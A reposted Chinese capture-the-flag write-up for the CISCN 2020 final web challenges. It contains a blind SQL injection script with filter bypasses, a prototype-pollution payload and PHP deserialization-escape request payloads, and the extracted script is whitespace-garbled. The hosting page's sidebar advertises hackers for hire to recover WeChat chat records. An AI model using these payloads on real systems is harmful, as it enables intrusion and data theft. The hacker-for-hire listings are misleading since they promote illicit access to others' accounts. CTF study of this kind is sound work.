找黑客平台

对ciscn final的web的小解析

访客4年前黑客文章615
本文首发于“合天智汇”公众号 作者:HhhM
web1
输入1点击输入框后会显示如下参数:
?id=1&limit=1
看下源码能得到这么两句sql语句:
<!-- 
$query="SELECT * FROM fake_flag WHERE id=$id limit 0,$limit";
//$query="SELECT flag FROM real_flag WHERE id=$id limit 0,$limit";
-->
会发现左右过滤不相同,尝试如下可以把limit语句注释掉:
id=1
此时sql语句变成:
SELECT * FROM fake_flag WHERE id=1可控内容
空格被过滤了,可以考虑	或
来绕过,因此输入如下会发现语句执行成功:
?id=-1or%0a1
or 1=1发现等于号被过滤,fuzz一下能得到部分可用函数,且左边没有过滤减号:
ord
mid
group_concat
过滤逗号可以采用from(1)for(1)的形式来绕过。
盲注脚本:
# conding=utf-8# ciscn2020 web1 blindimportrequests

req =requests.session()url ="http://ip:port/?id={0}&limit={1}"defcommonGET():payload1 ="-1	or	{0}-ord(mid((select	group_concat(flag)	from(real_flag))from({0})for(1)))"chars ='-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'result =""fori inrange(1,50):forj inchars:payload3 =payload1.format(ord(j))payload4 =payload2.format(i)url1 =url.format(payload3,payload4)rep =req.get(url1)text =rep.text
            # print(text)if"searched nothing"intext:result +=j
                print(result)commonGET()
web2
比赛没咋看这个题,源码只存了个app.js跑不起来就没复现,大概看了一下是原型链污染。
player是一个字典,注意到:
因为monster也是一个字典,且存在hp,并且我们是先攻击怪兽,因此我们污染buff的话就可以一刀秒了boss,然后就是用这一个循环进行污染:
传入:
{“__proto__“:{“buff”: 1000}}
那么就会把玩家的buff污染为1000,那么看到伤害的计算:
攻击+buff,也就是说这里就可以让玩家攻击无限大直接秒了boss了。
本地测试可以发现如下:
打败boss即可getflag。
web3
Web3其实考了两个点一个是反序列化逃逸,一个是反序列化串中的s替换为S时可以把字符串用16进制表示,个人感觉这个题其实就是0ctfpiapiapia+强网杯2020的web辅助。
wwwroot.zip源码泄露。
给了一个user类,逃逸点在于:
privatefunctionwaf($string){$waf='/phar|file|gopher|http|sftp|flag/i';returnpreg_replace($waf,'index',$string);}
至于从哪里进行序列化串的传入,看到:
先说我们传入的虽然是一个数组, 但因为waf处如果我们传入一个flag,就会被替换为index,此时长度差为1。
在这里会把我们的序列化串waf后再反序列化,我们利用它可以逃逸出来一个user对象。
waf的话可以使用s替换为S以此使用16进制来表示flag.php来绕过,这一个过滤限制了我们只能使用old_password字段,否则的话可以采用gopher替换为index来吃掉部分序列化串。
需要伪造的序列化串为这么一串东西,长度为196,所以这里需要196个flag替换为index:
本地模拟一下过waf会发现这里长度980其实就是index的长度总和:
那么余下的序列化串理所当然就逃逸出去了。
update_username=1&old_password=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:1:"1";O:4:"User":6:{S:8:"username";s:1:"1";S:8:"password";s:1:"1";s:3:"age";s:1:"1";s:5:"email";s:1:"1";S:12:"\00User\00avatar";S:8:"\66\6C\61\67\2E\70\68\70";S:13:"\00User\00content";s:0:"";}&update_password=123&update_age=1&update_email=231@qq.com
当然了如果没有前面对字段的格式过滤,也可以采用如下的payload:
update_username=1&old_password=1&update_password=1&update_email=";s:5:"email";'.'O:4:"User":6:{S:8:"username";s:1:"1";S:8:"password";s:1:"1";s:3:"age";s:1:"1";s:5:"email";s:1:"1";S:12:"\00User\00avatar";S:8:"\66\6C\61\67\2E\70\68\70";S:13:"\00User\00content";s:0:"";}&update_age=gophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergopher
                                

                    标签:                    对ciscn final的web的小解析                

                                            

        

        

            返回列表
            
上一篇:歇后语故事大全(故事类的经典歇后语大全)

            
下一篇:公园50块钱交易(做一次爱一百块钱划算吗)

        

    

	

		
相关文章

		

		

						
黑客网站装逼,美国网络被黑客攻击,黑客软件下载大全中文版

						
0×01 ARP帧格局植入歹意sdk插件方法,xx.sdk中运用在歹意运用植入成功后,歹意代码包经过start Service的方法拉起歹意运用的服务,长时间躲藏在用户手机中。 id; /* The...

				
蚂蚁庄园小课堂5月24日答案 一口健康的牙齿其实应该是什么颜色的

						
蚂蚁庄园小课堂5月24日答案 一口健康的牙齿其实应该是什么颜色的

						
今天支付宝蚂蚁庄园2020年5月24日庄园小课堂的答案是什么呢?蚂蚁庄园庄园小课堂2020年5月24日的问题是【小鸡宝宝考考你,一口健康的牙齿其实应该是什么颜色的】。下面小编就为大家带来了答案,不清楚...

				

						
哪里找黑客恢复微信聊天记录,黑客防线订阅网站

						
一、哪里恢复微信聊天记录怎么找黑客 1、黑客接单这些人的正确英语名称是Cracker,他们被翻译成骇人听闻的人。哪里恢复微信聊天记录入门教学网页上到处都是。找黑客网站开车去接车的后点,开始计算在终点结...

				

						
人贵有自知之明的名言(人贵有自知之明出自何处)

						
  这一全世界,每一个人都不一样。有的人很聪慧,有的人很平凡,有的人很强,有的人太弱,人的个性、工作能力、历经都不一样。仅有充足认识自己,依据自身的发展潜力去发展趋势,才可以真实的取得成功和欢乐。  ...

				
生活中增长睡觉时间的小技巧 怎么判断睡得好不好

						
生活中增长睡觉时间的小技巧 怎么判断睡得好不好

						
针对睡觉时间少的人而言,必须增加就寝时间,而睡眠好的人就需要持续保持,培养优良的作息规律才有利于人体的身心健康,下边我产生:日常生活提高睡眠时间的小窍门 怎么判断睡得怎么样。 日常生活提高睡眠时...

				
鱼胶是什么东西(鱼胶有什么功效)

						
鱼胶是什么东西(鱼胶有什么功效)

						
鱼胶又称花胶,是由鱼鳔制作而成的,价格非常的高端,中医认为鱼胶味甘性平,具有养血止血,补肾固精的功效,适合孕妇、老人以及气血两亏及贫血的人服用。那么鱼胶是什么?鱼胶和花胶的区别是什么? 鱼胶是什...

				
		

	

    



    

                    

    

    

    

        

            
Copyright Your WebSite.Some Rights Reserved.

            
            
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!
            
Hacker by Hacker.